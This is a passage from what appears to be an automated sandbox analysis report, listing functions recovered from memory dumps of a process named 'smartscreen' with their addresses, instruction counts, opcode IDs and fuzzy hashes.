                                                              • Instruction Fuzzy Hash: 9AE04F31A4F7C04FC74B973488788507FA1DE5721074A45EEC085CF5B3D6198D49C701
                                                              Function 00007FFD9B7BD869 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction ID: bf4e0e619de8f275e65c4db50b820028ece5d949631a47f6ca0e263d6d0719b4
                                                              • Opcode Fuzzy Hash: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction Fuzzy Hash: 50E04F6194F7C04FC70B9B3588B88407F60EE2721178A45EEC085CF1B3E6198C49C701
                                                              Function 00007FFD9B7BCF79 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction ID: 226f5cdc0ad8bc2c5e4dff0f02c3e0c1f604d46dfeb201affb1b12e14cf5709f
                                                              • Opcode Fuzzy Hash: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction Fuzzy Hash: B7E0EC3150A7844FC70A9B2488A99943FB0EF2621178A01EBC449CF5B3D6299888CB52
                                                              Function 00007FFD9B7B1DF0 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                              Function 00007FFD9B7BB958 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction ID: 70612281d9585890a6d6f4cf59acf35b8267b14e10d1c9ea082ef5e7cea4887d
                                                              • Opcode Fuzzy Hash: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction Fuzzy Hash: E9D01234B519044FC71CA63C886987473D1EB6A217B9541B9D00AD72B1D96ADD89CB41
                                                              Function 00007FFD9B7B7070 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction ID: 7d5a485abe3f1a101fe236d7c12fdd607988a3ec4558fc01dadeabbbd6232ba3
                                                              • Opcode Fuzzy Hash: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction Fuzzy Hash: 6BD02230B649040FC70CAA3C88588307390EB6A20278100A8D00BD72B1E92ADD88CB40
                                                              Function 00007FFD9B780B9D Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction ID: 2a1721bd37c2c0e229c6edeb69d2e9e63533fe1581581a77562d8443ec22fc0d
                                                              • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction Fuzzy Hash: E7C0123062990E8FDA40BB28C8C9824BBA0FB0E202BDA01E4E00CC71B1D629A8908700
                                                              Function 00007FFD9B7B2608 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4347e3d70227cd52dd1ebe2ab705aaaceedd0456e119f43ff638eecda83fc9cb
                                                              • Instruction ID: c78e4ad465f238b465591a35a9c110f9ab59dc1c0d4bf03cf8044a9a270ec525
                                                              • Opcode Fuzzy Hash: 4347e3d70227cd52dd1ebe2ab705aaaceedd0456e119f43ff638eecda83fc9cb
                                                              • Instruction Fuzzy Hash: DDD05E65F1E7AA4AE764A6989871BA97691AF44304F0501B4E41D836E7D9183C448E82
                                                              Function 00007FFD9B7806AD Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction ID: faff3e12c8c9fe63c49ea462aac9b206cb8c5b8a4464a0f790921376c9a1d048
                                                              • Opcode Fuzzy Hash: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction Fuzzy Hash: B7C04C05F5FF5F01E47531EE54E60ADB6409FC4A26FE31772D50D801B29C6E22D50196
                                                              Function 00007FFD9B7812B8 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction ID: 693aefd0555aa7c13d0ffe86cffec59e3527bad17fa240652fc2ed9797b61d88
                                                              • Opcode Fuzzy Hash: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction Fuzzy Hash: 5CC08C30611C0C8FC908EB28C88480433A0FB09201BC200A0E00AC7170D229DCC0C740
                                                              Function 00007FFD9B7854F9 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa98d956b3299567adc0035c0a7ed27c328063e9acfa84007b860a3a62858e88
                                                              • Instruction ID: 1294abcbf22a897e0b2fab90824585950e3a78e407270f91a2adaaf55231d212
                                                              • Opcode Fuzzy Hash: fa98d956b3299567adc0035c0a7ed27c328063e9acfa84007b860a3a62858e88
                                                              • Instruction Fuzzy Hash: 13C08C00F28C1E0AF21A2B14043013D00424B84316F8980B0E40EC37DECC2D5F0202CA
                                                              Function 00007FFD9B7806D0 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction ID: 55681b21aa852a478038f68aa83c82495a066b141e3c6cd6be9a93864b0cfab4
                                                              • Opcode Fuzzy Hash: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction Fuzzy Hash: 9DB01200D5BD4F00E42431FB08D30647440AF84105FD30270E40C802B2986E12940282

                                                              Non-executed Functions

                                                              Function 00007FFD9B7809B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction ID: a8db8b9a5516349690576d0cceb03b37db2f7a8324dbcda29aa8caba863ed978
                                                              • Opcode Fuzzy Hash: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction Fuzzy Hash: EE51CE0BB8E52A49E31933FD75618FC6B458FA5335B0843B7F06E890DB8E18608186E5

                                                              Executed Functions

                                                              Function 00007FFD9B770D48 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5Z_H
                                                              • API String ID: 0-3267294416
                                                              • Opcode ID: 71903f3db588ad17d4a079ef42ee95f061979a194e70ad9dbb65b5b10e2af421
                                                              • Instruction ID: e2879359efbd658f70b0676edda1e047bb0324198e92518f5dcfb69af33ee966
                                                              • Opcode Fuzzy Hash: 71903f3db588ad17d4a079ef42ee95f061979a194e70ad9dbb65b5b10e2af421
                                                              • Instruction Fuzzy Hash: C2910379A19A8D8FE789DF68C8A57A97FE1FF56300F0101BAD059C73E6DAB824108740
                                                              Function 00007FFD9BB14F04 Relevance: .4, Instructions: 429COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dca546c3effe4e5cdf69614a021382321cef5abb14733f2f623eb301a45e1611
                                                              • Instruction ID: 22655ebd732020711e2a353171063dcbb610bcc9647c911d71515eb04769ab79
                                                              • Opcode Fuzzy Hash: dca546c3effe4e5cdf69614a021382321cef5abb14733f2f623eb301a45e1611
                                                              • Instruction Fuzzy Hash: AAD1A531B19A1D4FEBA9EB6898B66B873D1FF99314F420179D40EC32E2DE247D418781
                                                              Function 00007FFD9BB183B9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 5d33a17cec4057c047205f8171d55b98659f86cd88588edd0a522ed5bb3e3724
                                                              • Instruction ID: 9f4d3cb8f88670f890f01f3d6cdabbe2553719d919bbc3b40e3d539a3202cdbf
                                                              • Opcode Fuzzy Hash: 5d33a17cec4057c047205f8171d55b98659f86cd88588edd0a522ed5bb3e3724
                                                              • Instruction Fuzzy Hash: D9F09B7190E3C44FCB16AE3488684547FA0EF6724174A52EFD096CF1E3EA2CD885CB21
                                                              Function 00007FFD9BB14819 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 525e721f32b948be9f4163c78e200920dabfa4beee0eb65fdaf9dd7519e793fd
                                                              • Instruction ID: b6f2e65ff6c992b7f89f365062796bdb87655805f07623248b46a8ae81f36f5c
                                                              • Opcode Fuzzy Hash: 525e721f32b948be9f4163c78e200920dabfa4beee0eb65fdaf9dd7519e793fd
                                                              • Instruction Fuzzy Hash: ACE0E56154E3C44FCB16EA7488698447FA0AE6B21178B41EEC185CF1B3E6299949CB11
                                                              Function 00007FFD9BB185F9 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 7a4c9bf4ba422eeb561ae5001aa16d3ef17c757f93c502558a469b22cdd01875
                                                              • Instruction ID: a396f10620f219433b1a28c04c144a3e51c8851f78fd27da190f40c5cceeb4e6
                                                              • Opcode Fuzzy Hash: 7a4c9bf4ba422eeb561ae5001aa16d3ef17c757f93c502558a469b22cdd01875
                                                              • Instruction Fuzzy Hash: DAE0E5A254F3C44FCB16AB7488698447FA0AE6B21078B41EEC085CB1F3E62D9849CB11
                                                              Function 00007FFD9BB17BD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: b116f35ef6c40a226e52182232635022f033cb65b765ef0df0c5535a49f784ac
                                                              • Instruction ID: 11d7075856ce3cc078690b1f307a188b5a16a80a99e86ddca14ab22ced7c08d0
                                                              • Opcode Fuzzy Hash: b116f35ef6c40a226e52182232635022f033cb65b765ef0df0c5535a49f784ac
                                                              • Instruction Fuzzy Hash: 60E01A6194E7C44FCB56EB74887A9457FA0AEA721178B41EEC089CF1B3E62D9849C702
                                                              Function 00007FFD9BB17B5A Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 9a82e0d408322314765f8ada8075404a65f155571dcaa5b9e3f88f3449426851
                                                              • Instruction ID: 3f710b2ef2ab5781f0dd85a662c7051f1b9dd9fde917ae116a1ba672b6b99df1
                                                              • Opcode Fuzzy Hash: 9a82e0d408322314765f8ada8075404a65f155571dcaa5b9e3f88f3449426851
                                                              • Instruction Fuzzy Hash: 76E0C27160A5494FDB18EE398468855BF80EB6720134552ADC01ACB1A7EE29D8C5CB00
                                                              Function 00007FFD9B770945 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8a90f7376a80223b85dcd6faaec1ac6c848e83c9e9e3590ea1a07e4d3e54485
                                                              • Instruction ID: 8ed8980435489a5567675f883e9d802899738fb9a387bd977c938f082abcc47e
                                                              • Opcode Fuzzy Hash: a8a90f7376a80223b85dcd6faaec1ac6c848e83c9e9e3590ea1a07e4d3e54485
                                                              • Instruction Fuzzy Hash: 3841053270D9194FE728EAACF89A9F977D0EF4632070501BBE08AC7167DD11AC8287C1
                                                              Function 00007FFD9B770960 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a2095e00055ff324d767b41827512beeaa4d98aa2d647fa69727c09c663237de
                                                              • Instruction ID: bfb2c0a106afb6035345bdcfc44b9117634df4e17a2010b56ffe6441dd194ced
                                                              • Opcode Fuzzy Hash: a2095e00055ff324d767b41827512beeaa4d98aa2d647fa69727c09c663237de
                                                              • Instruction Fuzzy Hash: 44310A26B1CA1D1FF758B66C64AAAF877C2DF98325F1105BAE40EC32F7CD18AC414284
                                                              Function 00007FFD9BB17D06 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c257c463180a9d62461d8803a4bff975793c4e8b567f79e640789aed992ac41a
                                                              • Instruction ID: e7f5c1c568536624e1c458a0dd77df2499ecb287ebdd1c91757aa92209becaf8
                                                              • Opcode Fuzzy Hash: c257c463180a9d62461d8803a4bff975793c4e8b567f79e640789aed992ac41a
                                                              • Instruction Fuzzy Hash: B1316AA2B1E6494BE329AF6888666B537D1FF95314F1601BDE40EC32D3DD18BD418282
                                                              Function 00007FFD9B77116D Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63bb63ecffbadf5cf9ec2db4bd329313ddf4f19ad05f610b3f22055e59abb4ca
                                                              • Instruction ID: aad4de0e3302fcae364df28ae8c660c490ecf16ace14bb5eb4f7a4b3c1d4793c
                                                              • Opcode Fuzzy Hash: 63bb63ecffbadf5cf9ec2db4bd329313ddf4f19ad05f610b3f22055e59abb4ca
                                                              • Instruction Fuzzy Hash: B831A431A0964E8FDF45EB68C8A59A97BF0FF56310F0546BAC009DB1B2DB79A541CB40
                                                              Function 00007FFD9B770998 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19cbd34efef87a473ef77d6eb7ae392b32829f749b5eea4e27bad96f4e092677
                                                              • Instruction ID: 215da5c357cea35f8d781f5bfd88ec63a3d46082c741463fd96cc42d7d1e0f6c
                                                              • Opcode Fuzzy Hash: 19cbd34efef87a473ef77d6eb7ae392b32829f749b5eea4e27bad96f4e092677
                                                              • Instruction Fuzzy Hash: EE210720B29A5D0FF798F66C94AAA7577C3EF88311F5101B9E40EC33F6DC54AC418241
                                                              Function 00007FFD9B770C25 Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ca2766b1c081ff204fdf28d2843bdb4800e3cb596217ee06d58ea7d3363a49f8
                                                              • Instruction ID: 5d9730e3e9103f8b802db3a72be5721f2e4bd25c9ef5f57318be572ad5447e2a
                                                              • Opcode Fuzzy Hash: ca2766b1c081ff204fdf28d2843bdb4800e3cb596217ee06d58ea7d3363a49f8
                                                              • Instruction Fuzzy Hash: 6111D236A0E3898FEB12DBB8C8551DD7FA0EF42320F1986B7C444CB1E2D634264AC791
                                                              Function 00007FFD9B776CAB Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a98cd95a06c93f5eb8fc4795411f824816ef7d14873c28e8f4f33e72804f81a
                                                              • Instruction ID: 6065be307a76cc70d26961a334b1f02214afbcdb98cc2ad4e1b4728ff49e1d00
                                                              • Opcode Fuzzy Hash: 2a98cd95a06c93f5eb8fc4795411f824816ef7d14873c28e8f4f33e72804f81a
                                                              • Instruction Fuzzy Hash: 1F212135E19A1D8FDBB5DB48C4A4BE973E1FB68300F1102BAD40DD32B5DA74AA408B80
                                                              Function 00007FFD9BB149E5 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3efac70a558086e47338c4ab217e7b930d2bae8216aed42dba92c0fa49de844e
                                                              • Instruction ID: df9f0e99e027fb4c6448efeb6baeb77c4b0a340972b5e028f3d617df407b9d6e
                                                              • Opcode Fuzzy Hash: 3efac70a558086e47338c4ab217e7b930d2bae8216aed42dba92c0fa49de844e
                                                              • Instruction Fuzzy Hash: CE01B121B1F68E0FE7A5EAA998E43746781FF96704F4611BAD048C31E2DC582A82C745
                                                              Function 00007FFD9B770C38 Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e23f70650f26b88ce26929d85baf1be89cb675be9b8fae83590ac9af7ab7965b
                                                              • Instruction ID: ebbde08e30c2627f0440866df66d31bfe20cb2e29727d171d8cd701aedfef9ab
                                                              • Opcode Fuzzy Hash: e23f70650f26b88ce26929d85baf1be89cb675be9b8fae83590ac9af7ab7965b
                                                              • Instruction Fuzzy Hash: 0F118235A0E7898FE702DBB8C9552DD7FA0DF42210F0545F7C444DB1E2D5382646C791
                                                              Function 00007FFD9B770C40 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c3dbde6dc415639cae9f52513c2bf57ffab6cd6699f04e7bad3314312eab01a2
                                                              • Instruction ID: e07eade92beb357d67d57ba227c1d034b2ffc8253fd57cd7d1da7612acac983e
                                                              • Opcode Fuzzy Hash: c3dbde6dc415639cae9f52513c2bf57ffab6cd6699f04e7bad3314312eab01a2
                                                              • Instruction Fuzzy Hash: EB018035A0E3898FE702DB74C9652DD7FB0DF42210F0545FBC444DB1A6D6382649CB91
                                                              Function 00007FFD9B774CD0 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 03e6aaf0d15bf92d8241cb2878973c1df7f5bb48aff1ecddefaaf577ae2ef1a7
                                                              • Instruction ID: e130386631a969874dee1170253555355288d449f240c631488851c760bb6725
                                                              • Opcode Fuzzy Hash: 03e6aaf0d15bf92d8241cb2878973c1df7f5bb48aff1ecddefaaf577ae2ef1a7
                                                              • Instruction Fuzzy Hash: 05011E21F19B1D4EEBB5A65888B4BBD71D1EF48710F4202B9E45ED32B2EF686E404700
                                                              Function 00007FFD9B770C48 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
